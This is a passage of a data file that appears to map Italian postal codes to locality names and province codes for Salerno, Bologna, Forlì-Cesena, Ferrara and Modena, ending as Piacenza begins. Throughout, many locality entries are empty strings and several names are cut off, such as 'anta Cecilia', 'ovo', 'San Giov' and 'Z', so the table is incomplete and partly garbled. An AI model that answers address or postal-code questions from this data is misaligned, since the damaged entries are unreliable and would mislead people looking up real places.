["Roscigno", "SA"], ["Castelcivita", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Petina", "SA"], ["Centro Urbano", "SA"], ], "84021": [["Tufariello", "SA"], ["Buccino", "SA"], ["Buccino Stazione", "SA"]], "84022": [["Serradarce", "SA"], ["Puglietta", "SA"], ["Quadrivio", "SA"], ["Campagna", "SA"]], "84023": [["Persano", "SA"]], "84024": [["", "SA"], ["", "SA"]], "84025": [ ["anta Cecilia", "SA"], ["Santa Cecilia Di Eboli", "SA"], ["", "SA"], ["Eboli", "SA"], ], "84026": [["Postiglione", "SA"]], "84027": [["", "SA"]], "84028": [["", "SA"], ["Serre", "SA"]], "84029": [ ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Zuppino", "SA"], ["Scorzo", "SA"], ], "84030": [ ["Torraca", "SA"], ["Sanza", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Sicili'", "SA"], ["Pertosa", "SA"], ["Caggiano", "SA"], ["Taverne", "SA"], ["Tortorella", "SA"], ["Morigerati", "SA"], ["", "SA"], ["", "SA"], ["Battaglia", "SA"], ["Casalbuono", "SA"], ["", "SA"], ], "84031": [["Auletta", "SA"]], "84032": [["Buonabitacolo", "SA"]], "84033": [ ["", "SA"], ["", "SA"], ["Tardiano", "SA"], ["", "SA"], ["Arenabianca", "SA"], ], "84034": [["", "SA"], ["Padula", "SA"]], "84035": [["Polla", "SA"]], "84036": [["", "SA"], ["Trinita'", "SA"]], "84037": [["Sant'Arsenio", "SA"]], "84038": [["Sassano", "SA"], ["Caiazzano", "SA"], ["Silla", "SA"]], "84039": [ ["", "SA"], ["", "SA"], ["Teggiano", "SA"], ["", "SA"], ], "84040": [ ["Poderia", "SA"], ["Velina", "SA"], ["Cannalonga", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Alfano", "SA"], ["Ponte", "SA"], ["Campora", "SA"], ["Acquavella", "SA"], ["", "SA"], ], "84042": [["Acerno", "SA"]], "84043": [["Agropoli Stazione", "SA"], ["Agropoli", "SA"]], "84044": [["Matinella", "SA"], ["Albanella", "SA"]], "84045": [["", "SA"], ["Carillia", "SA"], ["", "SA"], ["Cerrelli", "SA"]], "84046": [ ["", "SA"], ["", "SA"], ["Terradura", "SA"], ["Catona", "SA"], ["", "SA"], ["Ascea", "SA"], ["", "SA"], ["Mandia", "SA"], ], "84047": [ ["Paestum", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Capaccio", "SA"], ["Gromola", "SA"], ["Laura", "SA"], ["Cafasso", "SA"], ["Vannullo", "SA"], ["ovo", "SA"], ["", "SA"], ["Licinella", "SA"], ["Santa Venere", "SA"], ["Rettifilo", "SA"], ], "84048": [ ["San Marco", "SA"], ["Castellabate", "SA"], ["Santa Maria", "SA"], ["Santa Maria Di Castellabate", "SA"], ["", "SA"], ], "84049": [["", "SA"]], "84050": [ ["Laurito", "SA"], ["Capitello", "SA"], ["", "SA"], ["Giungano", "SA"], ["", "SA"], ["Lustra", "SA"], ["Matonti", "SA"], ["Ispani", "SA"], ["", "SA"], 
["Capizzo", "SA"], ["", "SA"], ["Futani", "SA"], ["Sorvaro", "SA"], ], "84051": [ ["San Severino", "SA"], ["San Severino Di Centola", "SA"], ["Foria", "SA"], ["Centola", "SA"], ["San Nicola", "SA"], ["San Nicola Di Centola", "SA"], ["Palinuro", "SA"], ], "84052": [ ["San Biase", "SA"], ["Ceraso", "SA"], ["Santa Barbara", "SA"], ["San Sumino", "SA"], ["Massascusa", "SA"], ], "84053": [["", "SA"], ["Cicerale", "SA"]], "84055": [["Felitto", "SA"]], "84056": [["Cardile", "SA"], ["Gioi", "SA"]], "84057": [["", "SA"], ["Laurino", "SA"]], "84059": [["Lentiscosa", "SA"], ["Camerota", "SA"], ["Licusati", "SA"], ["", "SA"]], "84060": [ ["Vatolla", "SA"], ["Montecorice", "SA"], ["", "SA"], ["Abatemarco", "SA"], ["Massicelle", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Omignano", "SA"], ["Acquavena", "SA"], ["", "SA"], ["Orria", "SA"], ["Ostigliano", "SA"], ["", "SA"], ["", "SA"], ["Pellare", "SA"], ["Case Del Conte", "SA"], ["", "SA"], ["Perdifumo", "SA"], ["Roccagloriosa", "SA"], ["Ortodonico", "SA"], ["Fornelli", "SA"], ["", "SA"], ["Perito", "SA"], ["", "SA"], ], "84061": [["Eredita", "SA"], ["", "SA"], ["Finocchito", "SA"]], "84062": [ ["", "SA"], ["Salitto", "SA"], ["Monticelli", "SA"], ["Ariano", "SA"], ["Valle", "SA"], ], "84065": [["Piaggine", "SA"]], "84066": [["Pisciotta", "SA"], ["", "SA"], ["Rodio", "SA"], ["Caprioli", "SA"]], "84067": [["Santa Marina", "SA"], ["", "SA"]], "84068": [ ["", "SA"], ["Celso", "SA"], ["Pollica", "SA"], ["Pioppi", "SA"], ["Acciaroli", "SA"], ["Galdo", "SA"], ["Cannicchio", "SA"], ], "84069": [["Acquaviva", "SA"], ["Carratiello", "SA"], ["Fonte", "SA"], ["Roccadaspide", "SA"], ["Serra", "SA"]], "84070": [ ["San Mauro La Bruca", "SA"], ["Scario", "SA"], ["Rofrano", "SA"], ["Bosco", "SA"], ["", "SA"], ["San Mauro Cilento", "SA"], ["Trentinara", "SA"], ["Salento", "SA"], ["Rutino", "SA"], ["", "SA"], ["Sacco", "SA"], ["San Giov", "SA"], ["Casalsottano", "SA"], ["Serramezzana", "SA"], ], "84073": [["Sapri", "SA"]], "84074": [ ["San Mango Cilento", "SA"], ["San Mango", "SA"], ["Santa Lucia Cilento", "SA"], ["Sessa Cilento", "SA"], ], "84075": [["Gorga", "SA"], ["Stio", "SA"]], "84076": [["Copersito", "SA"], ["Copersito Cilento", "SA"], ["Torchiara", "SA"]], "84077": [["Torre Orsaia", "SA"], ["", "SA"]], "84078": [["Pattano", "SA"], ["Angellara", "SA"], ["", "SA"], ["", "SA"]], "84079": [["Vibonati", "SA"], ["Villammare", "SA"]], "84080": [ ["Capezzano Inferiore", "SA"], ["Capezzano", "SA"], ["Capezzano Superiore", "SA"], ["Calvanico", "SA"], ["Capriglia", "SA"], ["Pellezzano", "SA"], ["Cologna", "SA"], ["Coperchia", "SA"], ], "84081": [ ["Baronissi", "SA"], ["Antessano", "SA"], ["Fusara", "SA"], ["Acquamela", "SA"], ["Saragnano", "SA"], ["Caprecano", "SA"], ["Sava", "SA"], ], "84082": [["Manzi", "SA"], ["Bracigliano", "SA"], ["San Nazario", "SA"]], "84083": [["Castelluccio", "SA"], ["Fimiani", "SA"], ["", "SA"], ["Lanzara", "SA"]], "84084": [ ["Villa", "SA"], ["Pizzolano", "SA"], ["Fisciano", "SA"], ["Settefichi", "SA"], ["Lancusi", "SA"], ["Bolano", "SA"], ["Penta", "SA"], ["Gaiano", "SA"], ], "84085": [ ["Spiano", "SA"], ["Carifi", "SA"], ["Curteri", "SA"], ["Sant'Angelo", "SA"], ["Pandola", "SA"], ["Ciorani", "SA"], ["Torello", "SA"], ["", "SA"], ["verino", "SA"], ["Sant'Eustachio", "SA"], ["Monticelli", "SA"], ["Acquarola", "SA"], ["", "SA"], ], "84086": [["", "SA"], ["", "SA"], ["Roccapiemonte", "SA"]], "84087": [["Lavorate", "SA"], ["Episcopio", "SA"], ["Sarno", "SA"]], "84088": [["Siano", "SA"]], "84090": [ ["Capitignano", "SA"], ["Prepezzano", "SA"], ["San 
", "SA"], ["", "SA"], ["Sieti", "SA"], ["Castelpagano", "SA"], ["Pugliano", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ], "84091": [ ["Battipaglia", "SA"], [" Di Battipaglia", "SA"], ["Sant'Anna", "SA"], ["Belvedere Di Battipaglia", "SA"], ], "84092": [["Bivio", "SA"], ["Bellizzi", "SA"]], "84095": [ ["", "SA"], ["Mercato", "SA"], ["Curti", "SA"], ["Santa Caterina", "SA"], ["Ornito", "SA"], ["San Giovanni", "SA"], ], "84096": [ ["", "SA"], ["Gauro", "SA"], ["Macchia", "SA"], ["San Martino Montecorv", "SA"], ["Lenzi", "SA"], ], "84098": [ ["", "SA"], ["Pontecagnano", "SA"], ["Magazzeno", "SA"], ["Sant'Antonio", "SA"], ["Corvinia", "SA"], ["", "SA"], ["Faiano", "SA"], ], "84099": [ ["", "SA"], ["Pezzano", "SA"], ["Campigliano", "SA"], ["Vignale", "SA"], ["Filetta", "SA"], ], "84100": [["Salerno", "SA"]], "84121": [["Salerno", "SA"]], "84122": [["Salerno", "SA"]], "84123": [["Salerno", "SA"]], "84124": [["Salerno", "SA"]], "84125": [["Salerno", "SA"]], "84126": [["Salerno", "SA"]], "84127": [["Salerno", "SA"], ["", "SA"]], "84128": [["", "SA"], ["Salerno", "SA"]], "84129": [["Salerno", "SA"]], "84131": [["Salerno", "SA"], ["", "SA"], ["Fuorni", "SA"], ["", "SA"]], "84132": [["Salerno", "SA"]], "84133": [["Salerno", "SA"]], "84134": [["Giovi", "SA"], ["Salerno", "SA"]], "84135": [["Fratte", "SA"], ["Salerno", "SA"], ["Ogliara", "SA"], ["Matierno", "SA"]], "40010": [ ["Bentivoglio", "BO"], ["", "BO"], ["", "BO"], ["Padulle", "BO"], ["Interporto Bentivoglio", "BO"], ["Santa Maria In Duno", "BO"], ["Sala Bolognese", "BO"], ], "40011": [ ["", "BO"], ["", "BO"], ["", "BO"], ["Santa Maria In Strada", "BO"], ], "40012": [ ["Bargellino", "BO"], ["", "BO"], ["", "BO"], ["Longara", "BO"], ["Lippo", "BO"], ["", "BO"], ], "40013": [ ["", "BO"], ["", "BO"], ["Progresso", "BO"], ["Trebbo", "BO"], ["", "BO"], ], "40014": [["Caselle", "BO"], ["", "BO"], ["Crevalcore", "BO"]], "40015": [ ["", "BO"], ["Bosco", "BO"], ["", "BO"], ["Galliera", "BO"], ["", "BO"], ["", "BO"], ], "40016": [["", "BO"]], "40017": [ ["Decima", "BO"], [" In Persiceto", "BO"], ["", "BO"], ["", "BO"], ["Budrie", "BO"], ], "40018": [["Maccaretolo", "BO"], ["San Pietro In Casale", "BO"]], "40019": [["Sant'Agata Bolognese", "BO"]], "40020": [["Casalfiumanese", "BO"]], "40021": [["Tossignano", "BO"], ["", "BO"]], "40022": [ ["", "BO"], ["Moraduccio", "BO"], ["Sassoleone", "BO"], ["", "BO"], ["Giugnola", "BO"], ], "40023": [["", "BO"]], "40024": [ ["", "BO"], ["", "BO"], ["", "BO"], ["Gallo", "BO"], ["Gaiana", "BO"], ], "40025": [["Fontanelice", "BO"], ["Carseggio", "BO"]], "40026": [ ["", "BO"], ["", "BO"], ["Imola", "BO"], ["Ponticelli", "BO"], ["Piratello", "BO"], ["", "BO"], ["", "BO"], ], "40027": [["Bubano", "BO"], ["Mordano", "BO"]], "40030": [ ["", "BO"], ["Berzantina", "BO"], ["Badi", "BO"], ["", "BO"], ["", "BO"], ["Piandisetta", "BO"], ["", "BO"], ["", "BO"], ["Suviana", "BO"], ], "40032": [["", "BO"], ["Bargi", "BO"], ["Camugnano", "BO"]], "40033": [["", "BO"], ["Ceretolo", "BO"], ["Cantagallo", "BO"]], "40034": [ ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ], "40035": [["", "BO"], ["Baragazza", "BO"], ["Lagaro", "BO"], ["Creda", "BO"]], "40036": [["Rioveggio", "BO"], ["Monzuno", "BO"], ["Vado", "BO"]], "40037": [["", "BO"], ["", "BO"], ["Fontana", "BO"], ["Borgonuovo", "BO"]], "40038": [["Susano", "BO"], ["Tole'", "BO"], ["Vergato", "BO"], ["Cereglio", "BO"], ["Riola", "BO"]], "40041": [ ["Marano", "BO"], ["", "BO"], ["Silla", "BO"], ["Bombiana", "BO"], ["", "BO"], ], "40042": [ ["Querciola", "BO"], ["Vidiciatico", "BO"], ["", 
"BO"], ["", "BO"], ["Pianaccio", "BO"], ["", "BO"], ["", "BO"], ], "40043": [["", "BO"], ["", "BO"], ["Marzabotto", "BO"], ["", "BO"]], "40046": [ ["Capugnano", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["Castelluccio", "BO"], ["Granaglione", "BO"], ["Vizzero", "BO"], ["", "BO"], ["", "BO"], ], "40048": [ ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ], "40050": [ ["", "BO"], ["Castelletto", "BO"], ["Funo", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["Centergross", "BO"], ["Monteveglio", "BO"], ["", "BO"], ["Loiano", "BO"], ["Gavignano", "BO"], ["Bisano", "BO"], ["Monterenzio", "BO"], ["Argelato", "BO"], ["", "BO"], ["Pizzano", "BO"], ["Calderino", "BO"], ["Casadio", "BO"], ["Savazza", "BO"], ["Venezzano", "BO"], ], "40051": [["Altedo", "BO"], ["Casoni", "BO"], ["Malalbergo", "BO"], ["Pegola", "BO"]], "40052": [["Boschi", "BO"], ["Baricella", "BO"], ["Mondonuovo", "BO"], ["", "BO"]], "40053": [["Valsamoggia", "BO"], ["Bazzano", "BO"]], "40054": [["Vedrana", "BO"], ["Bagnarola", "BO"], ["Riccardina", "BO"], ["Budrio", "BO"], ["Mezzolara", "BO"]], "40055": [["Fiesso", "BO"], ["Villanova", "BO"], ["Castenaso", "BO"]], "40056": [["Muffa", "BO"], ["Pragatto", "BO"], ["Crespellano", "BO"], ["Calcara", "BO"]], "40057": [ ["", "BO"], ["", "BO"], ["Lovoleto", "BO"], ["", "BO"], ], "40059": [ ["Portonovo", "BO"], ["Buda", "BO"], ["Medicina", "BO"], ["Ganzanigo", "BO"], ["Sant'Antonio", "BO"], ["", "BO"], ], "40060": [ ["", "BO"], ["Dozza", "BO"], ["Savigno", "BO"], ["Toscanella", "BO"], ["Vedegheto", "BO"], ], "40061": [["Minerbio", "BO"], ["", "BO"]], "40062": [ ["Marmorta", "BO"], ["", "BO"], ["Molinella", "BO"], ["Selva", "BO"], ["", "BO"], ["", "BO"], ], "40063": [["Monghidoro", "BO"]], "40064": [["Mercatale", "BO"], ["", "BO"]], "40065": [["Pianoro", "BO"], ["Livergnano", "BO"], ["", "BO"]], "40066": [["", "BO"]], "40067": [["Rastignano", "BO"]], "40068": [ ["", "BO"], ["Ponticella", "BO"], ["", "BO"], ["", "BO"], ["Farneto", "BO"], ["", "BO"], ["Pulce", "BO"], ], "40069": [["", "BO"], ["Riale", "BO"], ["Z", "BO"], ["Zola", "BO"]], "40100": [["Bologna", "BO"]], "40121": [["Bologna", "BO"]], "40122": [["Bologna", "BO"]], "40123": [["Bologna", "BO"]], "40124": [["Bologna", "BO"]], "40125": [["Bologna", "BO"]], "40126": [["Bologna", "BO"]], "40127": [["Bologna", "BO"], ["San Donnino", "BO"]], "40128": [["Bologna", "BO"], ["Corticella", "BO"]], "40129": [["Bologna", "BO"]], "40131": [["Bologna", "BO"], ["Bertalia", "BO"]], "40132": [["Borgo Panigale", "BO"], ["Bologna", "BO"]], "40133": [["Bologna", "BO"]], "40134": [["Bologna", "BO"]], "40135": [["Bologna", "BO"], ["Casaglia", "BO"]], "40136": [["Roncrio", "BO"], ["Gaibola", "BO"], ["Bologna", "BO"], ["Paderno", "BO"]], "40137": [["Bologna", "BO"]], "40138": [["Bologna", "BO"], ["Roveri", "BO"]], "40139": [["Bologna", "BO"]], "40141": [["Bologna", "BO"], ["San Ruffillo", "BO"], ["", "BO"]], "47010": [ ["", "FC"], ["Bocconi", "FC"], ["", "FC"], ["Portico E ", "FC"], ["San Benedetto In Alpe", "FC"], ["Galeata", "FC"], ["Premilcuore", "FC"], ], "47011": [["Terra Del Sole", "FC"], ["", "FC"], ["", "FC"]], "47012": [["Cusercoli", "FC"], ["Voltre", "FC"], ["Nespoli", "FC"], ["", "FC"]], "47013": [["San Ruffillo", "FC"], ["Dovadola", "FC"]], "47014": [ ["Teodorano", "FC"], ["Rico'", "FC"], ["San Colombano", "FC"], ["Meldola", "FC"], ["San Colombano Di Meldola", "FC"], ["Vitignano", "FC"], ["Para", "FC"], ], "47015": [["Santa Reparata", "FC"], ["Modigliana", "FC"]], "47016": [ ["Tontola", "FC"], ["", "FC"], ["Predappio", "FC"], 
["", "FC"], ["Fiumana", "FC"], ], "47017": [["", "FC"], ["Calbola", "FC"]], "47018": [["Biserno", "FC"], ["Corniolo", "FC"], ["Santa Sofia", "FC"]], "47019": [["Tredozio", "FC"]], "47020": [["Budrio", "FC"], ["Longiano", "FC"], ["Roncofreddo", "FC"], ["Montiano", "FC"], ["Oriola", "FC"]], "47021": [ ["", "FC"], ["Vessa", "FC"], ["Selvapiana", "FC"], ["San Piero In Bagno", "FC"], ["", "FC"], ], "47023": [ ["Bulgaria", "FC"], ["Cesuola", "FC"], ["Diegaro", "FC"], ["Saiano", "FC"], ["", "FC"], ["Sant'Egidio", "FC"], ["", "FC"], ["", "FC"], ["", "FC"], ["San Mauro In Valle", "FC"], ["Pievesestina", "FC"], ["", "FC"], ["Lizzano", "FC"], ["Macerone", "FC"], ["Celletta", "FC"], ["Gattolino", "FC"], ["", "FC"], ["Roversano", "FC"], ["Aie", "FC"], ["Cesena", "FC"], ["Calisese", "FC"], ["Tessello", "FC"], ["Martorano", "FC"], ["Ronta", "FC"], ["Borello", "FC"], ["Settecrociari", "FC"], ["", "FC"], ], "47025": [ ["Tornano", "FC"], ["Bacciolino", "FC"], ["", "FC"], ["Ciola", "FC"], ["Cella", "FC"], ["", "FC"], ["Piavola", "FC"], ["Linaro", "FC"], ["", "FC"], ], "47027": [ ["Sorbano", "FC"], ["", "FC"], ["Ranchio", "FC"], ["", "FC"], ["Sarsina", "FC"], ["Quarto", "FC"], ], "47028": [["Alfero", "FC"], ["Balze", "FC"], ["Verghereto", "FC"]], "47030": [ ["", "FC"], ["", "FC"], ["Borghi", "FC"], ["", "FC"], ["", "FC"], ["", "FC"], [" In Converseto", "FC"], ["Montegelli", "FC"], ["Rontagnano", "FC"], ["Montepetra", "FC"], ["", "FC"], ], "47032": [ ["", "FC"], ["Polenta", "FC"], ["Capocolle", "FC"], ["Collinello", "FC"], ["Panighina", "FC"], ["", "FC"], ["Bertinoro", "FC"], ["", "FC"], ], "47034": [["Forlimpopoli", "FC"], ["Selbagnone", "FC"]], "47035": [["Gambettola", "FC"]], "47039": [["", "FC"], ["", "FC"]], "47042": [["Bagnarola", "FC"], ["Cesenatico", "FC"], ["Villalta", "FC"], ["Sala", "FC"]], "47043": [["Gatteo", "FC"], ["", "FC"], ["", "FC"]], "47100": [ ["Villanova", "FC"], ["Pianta", "FC"], ["San Martino In Strada", "FC"], ["Rovere", "FC"], ["Barisano", "FC"], ["Ronco", "FC"], ["Villafranca", "FC"], ["Roncadello", "FC"], ["Carpinello", "FC"], ["San Lorenzo In Noceto", "FC"], ["", "FC"], ["", "FC"], ["Carpena", "FC"], ["Cava", "FC"], ["Vecchiazzano", "FC"], ], "47121": [["Forlì", "FC"]], "47122": [["Forlì", "FC"]], "44011": [ ["Argenta", "FE"], ["Ospital Monacale", "FE"], ["Anita", "FE"], ["Campotto", "FE"], ["Filo", "FE"], ["Traghetto", "FE"], ["La Fiorana", "FE"], ["San Nicolo'", "FE"], ["Boccaleone", "FE"], ["Longastrino", "FE"], ["Bando", "FE"], ["San Biagio", "FE"], ["Santa Maria Codifiume", "FE"], ["Consandolo", "FE"], ], "44012": [ ["Ospitale", "FE"], ["Pilastri", "FE"], ["Stellata", "FE"], ["Scortichino", "FE"], ["Burana", "FE"], ["Gavello", "FE"], ["Bondeno", "FE"], ], "44014": [["", "FE"]], "44015": [ ["Portomaggiore", "FE"], ["Maiero", "FE"], ["Gambulaga", "FE"], ["Ripapersico", "FE"], ["Portoverrara", "FE"], ["Runco", "FE"], ], "44019": [["Voghenza", "FE"], ["Montesanto", "FE"], ["Voghiera", "FE"]], "44020": [ ["", "FE"], ["", "FE"], ["", "FE"], ["Gorino", "FE"], ["", "FE"], ["Goro", "FE"], ["Medelana", "FE"], ["", "FE"], ["", "FE"], ["", "FE"], ["Ostellato", "FE"], ["Dogato", "FE"], ], "44021": [ ["Pomposa", "FE"], ["Codigoro", "FE"], ["Pontemaodino", "FE"], ["Mezzogoro", "FE"], ["Pontelangorino", "FE"], ], "44022": [["", "FE"], ["Volania", "FE"], ["Comacchio", "FE"], ["Vaccolino", "FE"]], "44023": [["Marozzo", "FE"], ["Lagosanto", "FE"]], "44026": [ ["Bosco", "FE"], ["Mesola", "FE"], ["", "FE"], ["Massenzatica", "FE"], ["Monticelli", "FE"], ["", "FE"], ["Ariano", "FE"], ], "44027": 
[["Migliaro", "FE"], ["", "FE"], ["Migliarino", "FE"], ["Fiscaglia", "FE"]], "44028": [["", "FE"], ["Coronella", "FE"], ["Gallo", "FE"], ["", "FE"]], "44029": [["Lido Di Spina", "FE"], ["Lido Degli Estensi", "FE"], ["Porto Garibaldi", "FE"]], "44030": [ ["Alberone Di Ro", "FE"], ["Guarda", "FE"], ["Ruina", "FE"], ["", "FE"], ["Alberone Di Guarda", "FE"], ], "44033": [["Ro", "FE"], ["Cologna", "FE"], ["Serravalle", "FE"], ["Berra", "FE"]], "44034": [ ["Tamara", "FE"], ["Fossalta", "FE"], ["Copparo", "FE"], ["Ambrogio", "FE"], ["Cesta", "FE"], ["", "FE"], ["Saletta", "FE"], ["Zenzalino", "FE"], ["Coccanile", "FE"], ["", "FE"], ["Gradizza", "FE"], ], "44035": [["Brazzolo", "FE"]], "44037": [["", "FE"]], "44039": [["Formignana", "FE"], ["Tresigallo", "FE"], ["Rero", "FE"], ["Final Di Rero", "FE"]], "44041": [["Casumaro", "FE"], ["", "FE"], ["Buonacompra", "FE"]], "44042": [ ["Penzale", "FE"], ["", "FE"], ["Alberone", "FE"], ["Cento", "FE"], ["Alberone Di Cento", "FE"], ["", "FE"], ], "44043": [["Mirabello", "FE"]], "44045": [["", "FE"], ["Renazzo", "FE"]], "44047": [["Dosso", "FE"], ["", "FE"], ["Sant'Agostino", "FE"]], "44049": [["", "FE"], ["", "FE"]], "44121": [["Ferrara", "FE"]], "44122": [["Ferrara", "FE"]], "44123": [["Ferrara", "FE"]], "44124": [["Ferrara", "FE"]], "41011": [["Panzano", "MO"], ["", "MO"], ["Campogalliano", "MO"]], "41012": [ ["Gargallo", "MO"], ["Budrione", "MO"], ["Fossoli", "MO"], ["Cortile", "MO"], ["Carpi", "MO"], ["", "MO"], ["Migliarina", "MO"], ["", "MO"], ["Santa Croce", "MO"], ], "41013": [ ["", "MO"], ["", "MO"], ["Riolo", "MO"], ["Cavazzona", "MO"], ["Rastellino", "MO"], ["Recovato", "MO"], ["Manzolino", "MO"], ["Piumazzo", "MO"], ], "41014": [ ["", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ], "41015": [ ["Bagazzano", "MO"], ["Nonantola", "MO"], ["", "MO"], ["", "MO"], ["Campazzo", "MO"], ["Redu'", "MO"], ], "41016": [["", "MO"], ["", "MO"], ["Novi Di Modena", "MO"]], "41017": [["Ravarino", "MO"], ["Stuffione", "MO"]], "41018": [["San Cesario Sul Panaro", "MO"]], "41019": [["Soliera", "MO"], ["Sozzigalli", "MO"], ["Appalto", "MO"], ["Limidi", "MO"]], "41020": [ ["", "MO"], ["Serpiano", "MO"], ["Castello", "MO"], ["Groppo", "MO"], ["Riolunato", "MO"], ["Castellino", "MO"], ], "41021": [ ["Canevare", "MO"], ["", "MO"], ["Ospitale", "MO"], ["Fellicarolo", "MO"], ["Serrazzone", "MO"], ["Lotta", "MO"], ["Fanano", "MO"], ["Trignano", "MO"], ["", "MO"], ["", "MO"], ], "41022": [["Fiumalbo", "MO"], ["", "MO"], ["Faidello", "MO"]], "41023": [ ["Sassostorno", "MO"], ["Vaglio", "MO"], ["Montecenere", "MO"], ["", "MO"], ["Lama", "MO"], ["Barigazzo", "MO"], ["Mocogno", "MO"], ["Cadignano", "MO"], ["", "MO"], ["Pianorso", "MO"], ], "41025": [["Montecreto", "MO"], ["Acquaria", "MO"]], "41026": [ ["Gaianello", "MO"], ["Castagneto", "MO"], ["Niviano", "MO"], ["Frassineti", "MO"], ["Monzone", "MO"], ["Sant'Antonio", "MO"], ["", "MO"], ["Gaiato", "MO"], ["Olina", "MO"], ["Montebonello", "MO"], ["Miceno", "MO"], ["Benedello", "MO"], ["Camatta", "MO"], ["Renno", "MO"], ["Iddiano", "MO"], ["Montorso", "MO"], ["", "MO"], ["Crocette", "MO"], ["Coscogno", "MO"], ["Verica", "MO"], ["Montecuccolo", "MO"], ], "41027": [ ["Pievepelago", "MO"], ["Tagliole", "MO"], ["", "MO"], ["Roccapelago", "MO"], ["", "MO"], ], "41028": [ ["Faeto", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ["Varana", "MO"], ["", "MO"], ["Ligorzano", "MO"], ["Valle", "MO"], ["Pazzano", "MO"], ["Montagnana", "MO"], ["", "MO"], ["Pompeano", "MO"], ["Ricco'", "MO"], ["Monfestino", "MO"], ["Serramazzoni", "MO"], ["Selva", 
"MO"], ], "41029": [ ["Vesale", "MO"], ["Sestola", "MO"], ["", "MO"], ["Casine", "MO"], ["Castellaro", "MO"], ["Roncoscaglia", "MO"], ["", "MO"], ], "41030": [ ["", "MO"], ["", "MO"], ["Sorbara", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ["Solara", "MO"], ["Gorghetto", "MO"], ["", "MO"], ["", "MO"], ["Bomporto", "MO"], ["San Prospero", "MO"], ["Bastiglia", "MO"], ["Staggia", "MO"], ], "41031": [["Camposanto", "MO"]], "41032": [["Cavezzo", "MO"], ["", "MO"], ["Motta", "MO"], ["", "MO"]], "41033": [ ["", "MO"], ["Santa Caterina", "MO"], ["", "MO"], ["Vallalta", "MO"], ["", "MO"], ["Fossa", "MO"], ], "41034": [["", "MO"], ["", "MO"]], "41035": [["", "MO"]], "41036": [["Villafranca", "MO"], ["Medolla", "MO"], ["", "MO"], ["Camurana", "MO"]], "41037": [ ["Gavello", "MO"], ["Cividale", "MO"], ["", "MO"], ["Quarantoli", "MO"], ["Mortizzuolo", "MO"], ["", "MO"], ["Tramuschio", "MO"], ["", "MO"], ["Mirandola", "MO"], ["", "MO"], ], "41038": [ ["Rivara", "MO"], ["", "MO"], ["San Biagio In Padule", "MO"], ["San Biagio", "MO"], ["Dogaro", "MO"], ["Pavignane", "MO"], ["Confine", "MO"], ], "41039": [["", "MO"]], "41040": [ ["Gombola", "MO"], ["", "MO"], ["", "MO"], ["Polinago", "MO"], ["Cassano", "MO"], ], "41042": [["Ubersetto", "MO"], ["", "MO"], ["Spezzano", "MO"]], "41043": [ ["Casinalbo", "MO"], ["", "MO"], ["Magreta", "MO"], ["Colombaro", "MO"], ["", "MO"], ["Formigine", "MO"], ], "41044": [ ["", "MO"], ["Romanoro", "MO"], ["Piandelagotti", "MO"], ["Riccovolto", "MO"], ["Rovolo", "MO"], ["Sassatella", "MO"], ["Frassinoro", "MO"], ["Fontanaluccia", "MO"], ["Cargedolo", "MO"], ], "41045": [ ["Lago", "MO"], ["Montefiorino", "MO"], ["Vitriola", "MO"], ["Macognano", "MO"], ["Farneta", "MO"], ["Gusciola", "MO"], ["Casola", "MO"], ["Rubbiano", "MO"], ], "41046": [ ["", "MO"], ["Susano", "MO"], ["Savoniero", "MO"], ["Palagano", "MO"], ["Boccassuolo", "MO"], ["Monchio", "MO"], ["Costrignano", "MO"], ], "41048": [ ["Morano", "MO"], ["", "MO"], ["Castelvecchio", "MO"], ["", "MO"], ["Pigneto", "MO"], ["", "MO"], ["", "MO"], ["Moncerrato", "MO"], ["Saltino", "MO"], ["Montebaranzone", "MO"], ], "41049": [["Sassuolo", "MO"], ["", "MO"], ["Montegibbio", "MO"]], "41051": [["Montale", "MO"], ["", "MO"], ["", "MO"]], "41052": [ ["Guiglia", "MO"], ["Samone", "MO"], ["Gainazzo", "MO"], ["", "MO"], ["Rocchetta", "MO"], ["Monteorsello", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ], "41053": [["", "MO"], ["Gorzano", "MO"], ["Maranello", "MO"], ["Pozza", "MO"]], "41054": [["", "MO"], ["Ospitaletto", "MO"], ["", "MO"], ["Festa'", "MO"]], "41055": [ ["Iola", "MO"], ["", "MO"], ["Montalto", "MO"], ["Bertocchi", "MO"], ["Salto", "MO"], ["", "MO"], ["Montese", "MO"], ["", "MO"], ["Montespecchio", "MO"], ["Castelluccio", "MO"], ["", "MO"], ["Maserno", "MO"], ["Semelano", "MO"], ], "41056": [ ["Formica", "MO"], ["Garofano", "MO"], ["Magazzino", "MO"], ["", "MO"], ["Mulino", "MO"], ], "41057": [["Spilamberto", "MO"], ["San Vito", "MO"]], "41058": [["Vignola", "MO"]], "41059": [ ["Monteombraro", "MO"], ["Montealbano", "MO"], ["Montetortore", "MO"], ["", "MO"], ["Montecorone", "MO"], ["Missano", "MO"], ["Zocca", "MO"], ["Rosola", "MO"], ["Ciano", "MO"], ], "41100": [ ["", "MO"], ["Vaciglio", "MO"], ["Marzaglia", "MO"], ["Modena", "MO"], ["Baggiovara", "MO"], ["", "MO"], ["Freto", "MO"], ["", "MO"], ["Lesignana", "MO"], ["", "MO"], ["Cognento", "MO"], ["Villanova", "MO"], ["Albareto", "MO"], ["", "MO"], ["Ganaceto", "MO"], ["Portile", "MO"], ["San Damaso", "MO"], ], "29010": [ ["Besenzone", "PC"], ["Agazzano", "PC"], ["Rottofreno", 
